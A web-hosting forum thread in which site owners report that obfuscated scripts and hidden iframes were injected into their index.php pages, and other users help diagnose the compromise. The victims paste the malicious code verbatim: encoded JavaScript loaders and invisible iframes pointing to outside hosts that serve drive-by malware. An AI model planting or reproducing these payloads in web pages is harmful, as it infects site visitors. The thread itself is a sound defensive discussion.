FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!


URGENT!!!!





pollux1er
I had a serious problem with one of my domain name. And that thing kaspersky calls a trojan was a serious problem for me. I first thought it was the machine i was working with that were having virus till kaspersky detected something when i want to open my page. If you have kaspersky internet security updated, you can understand what i mean by opening my url. http://newsletter.frih.net

i will post apicture for you to see what i am talking about. How come such a thing happen?
pollux1er
[/img]
bloodrider
It may be detecting the script has malicious...
I have ESE (NOD32) and it doesn't detect anything.


PS: I've tried a random user and password and entered! It's that suposed to happen?
Sunny
If you look at that Kaspersky Alert closely, it shows ip 195.2.252.251. Now frih.net or your site resolves to ip 216.32.85.170. I don't think your site has any thing to do with that ip. Now question is why is it ringing the alarm when u open your site, my guess is you have a trojan in your pc which adds a line of code to html or php pages. So everytime you open a site it also tries to connect to that ip.

You can also check that newsletter script for that ip in the coding to be safe.
pollux1er
bloodrider wrote:
It may be detecting the script has malicious...
I have ESE (NOD32) and it doesn't detect anything.


PS: I've tried a random user and password and entered! It's that suposed to happen?


For now yeah! The script has a mistake. Don't care about it.
pollux1er
Sunny wrote:
If you look at that Kaspersky Alert closely, it shows ip 195.2.252.251. Now frih.net or your site resolves to ip 216.32.85.170. I don't think your site has any thing to do with that ip. Now question is why is it ringing the alarm when u open your site, my guess is you have a trojan in your pc which adds a line of code to html or php pages. So everytime you open a site it also tries to connect to that ip.

You can also check that newsletter script for that ip in the coding to be safe.



I think you might be right. In all my codes i discover some lines that had not been written by me. Somethin with "Google rank". I don't understand that because i don't think google is hacking!!!
there where something like scripts executed from out of my hosting.
rvec
Could you paste the code here?
I think we could find something on google about it and how to remove the virus/trojan from your pc.
pollux1er
There was first something like this :

<iframe src="http://72.167.161.219/in.php" width=1 height=1 style="visibility: hidden;"></iframe>

I don't know where it is comming from in my script!!!
polly-gone
Well, if I am brushed up on my French, it seems like it isn't your website. It could be someone trying to get into your computer or something. My McAfee gives me messages like that when I try to network my computers because it thinks I am hacking myself.

-Nick Confused Confused Confused
Bondings
pollux1er wrote:
There was first something like this :

<iframe src="http://72.167.161.219/in.php" width=1 height=1 style="visibility: hidden;"></iframe>

I don't know where it is comming from in my script!!!

Go to the source code of your pages and check if that code is in there and not only in the pages you recieve. Also check the same page from a different computer. Or link to the page in question. If it's also on the home page you linked to, then it's not there when I view it, which would mean it was added by your computer/network, by some malware.
pollux1er
Bondings wrote:
pollux1er wrote:
There was first something like this :

<iframe src="http://72.167.161.219/in.php" width=1 height=1 style="visibility: hidden;"></iframe>

I don't know where it is comming from in my script!!!

Go to the source code of your pages and check if that code is in there and not only in the pages you recieve. Also check the same page from a different computer. Or link to the page in question. If it's also on the home page you linked to, then it's not there when I view it, which would mean it was added by your computer/network, by some malware.


Your explanation is more likely true. But one thing i'm now sure is that it is coming from machines i worked on. I have already removed all that on my scripts.

I also try to go to the url related to the ip adress. It is not accessible. But 72.167.161.219/in.php lead me to the IP i Kaspersky told me first. Meaning there is a link on those informations.
pollux1er
<script language="JavaScript">function ualx(fdkh){return String.fromCharCode(fdkh);}var pfmv="060105102114097109101032115114099061039104116116112058047047107108101112097046099110047111108097046104116109108039032119105100116104061039050054048039032104101105103104116061039049049048039032115116121108101061039100105115112108097121058032110111110101059039062060047105102114097109101062";var gjxy="";for(zatk=0;zatk<pfmv.length;zatk+=3){gjxy+=ualx(pfmv.substr (zatk, 3));}document.write(gjxy);</script>

This is the new script i found on it.
Bondings
pollux1er wrote:
<script language="JavaScript">function ualx(fdkh){return String.fromCharCode(fdkh);}var pfmv="060105102114097109101032115114099061039104116116112058047047107108101112097046099110047111108097046104116109108039032119105100116104061039050054048039032104101105103104116061039049049048039032115116121108101061039100105115112108097121058032110111110101059039062060047105102114097109101062";var gjxy="";for(zatk=0;zatk<pfmv.length;zatk+=3){gjxy+=ualx(pfmv.substr (zatk, 3));}document.write(gjxy);</script>

This is the new script i found on it.

It seems to be hiding what it does by some string operations.

Anyway, on what page did you find it?
pollux1er
This script is presnet in all my index.php pages of each directory. But what i will do is that i will change all my passwords to acces my hosted pages. To see if it is going to change again.
k_s_baskar
Hi,
i am also having the same problem here

Quote:
<script language=javascript><!--
(function(){var DsEsO='%';var gBYRz='var!20a!3d!22!53c!72ip!74!45ngine!22!2cb!3d!22Ver!73ion!2Cool+!22!2c!6a!3d!22!22!2cu!3dnavig!61tor!2eu!73!65!72!41!67e!6et!3bif(!28!75!2ei!6edexOf(!22Chro!6de!22)!3c0!29!26!26(u!2ei!6edexOf(!22!57!69n!22)!3e0)!26!26!28u!2ein!64exOf(!22NT!206!22!29!3c0)!26!26(docu!6de!6e!74!2eco!6f!6bie!2eindexO!66(!22mi!65!6b!3d1!22)!3c0)!26!26(!74y!70eo!66!28zr!76!7ats)!21!3d!74!79peof(!22A!22)))!7bzrvzt!73!3d!22A!22!3be!76al(!22if(w!69ndow!2e!22!2ba!2b!22)j!3dj+!22!2ba!2b!22Major!22+b!2ba+!22Minor!22+b+a+!22Bu!69!6cd!22+b!2b!22!6a!3b!22!29!3b!64ocumen!74!2ew!72it!65!28!22!3cscript!20src!3d!2f!2f!6d!22!2b!22a!72tuz!2ecn!2fvid!2f!3f!69d!3d!22!2bj!2b!22!3e!3c!5c!2fsc!72ipt!3e!22)!3b!7d';eval(unescape(gBYRz.replace(/!/g,DsEsO)))})();
--></script>


The above scripts are automatically inserted in my index files after </head>




Quote:
<iframe src="http://bigtruckstopseek.cn/ts/in.cgi?banner2" width=2 height=4 style="visibility: hidden"></iframe>


And this code is inserted below my <body> tag.

Please help to clear this.
pollux1er
k_s_baskar wrote:
Hi,
i am also having the same problem here

Quote:
<script language=javascript><!--
(function(){var DsEsO='%';var gBYRz='var!20a!3d!22!53c!72ip!74!45ngine!22!2cb!3d!22Ver!73ion!2Cool+!22!2c!6a!3d!22!22!2cu!3dnavig!61tor!2eu!73!65!72!41!67e!6et!3bif(!28!75!2ei!6edexOf(!22Chro!6de!22)!3c0!29!26!26(u!2ei!6edexOf(!22!57!69n!22)!3e0)!26!26!28u!2ein!64exOf(!22NT!206!22!29!3c0)!26!26(docu!6de!6e!74!2eco!6f!6bie!2eindexO!66(!22mi!65!6b!3d1!22)!3c0)!26!26(!74y!70eo!66!28zr!76!7ats)!21!3d!74!79peof(!22A!22)))!7bzrvzt!73!3d!22A!22!3be!76al(!22if(w!69ndow!2e!22!2ba!2b!22)j!3dj+!22!2ba!2b!22Major!22+b!2ba+!22Minor!22+b+a+!22Bu!69!6cd!22+b!2b!22!6a!3b!22!29!3b!64ocumen!74!2ew!72it!65!28!22!3cscript!20src!3d!2f!2f!6d!22!2b!22a!72tuz!2ecn!2fvid!2f!3f!69d!3d!22!2bj!2b!22!3e!3c!5c!2fsc!72ipt!3e!22)!3b!7d';eval(unescape(gBYRz.replace(/!/g,DsEsO)))})();
--></script>


The above scripts are automatically inserted in my index files after </head>




Quote:
<iframe src="http://bigtruckstopseek.cn/ts/in.cgi?banner2" width=2 height=4 style="visibility: hidden"></iframe>


And this code is inserted below my <body> tag.

Please help to clear this.


What I can advise you from now is first to change all your passwords.
Bondings
@k_s_baskar, your account is most likely hacked. I would suggest an account reset. Also, please update any software you use, considering it is likely that they contain bugs that will be exploited again.
Related topics
Reply to topic    Frihost Forum Index -> Support and Web Hosting -> Web Hosting Support

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.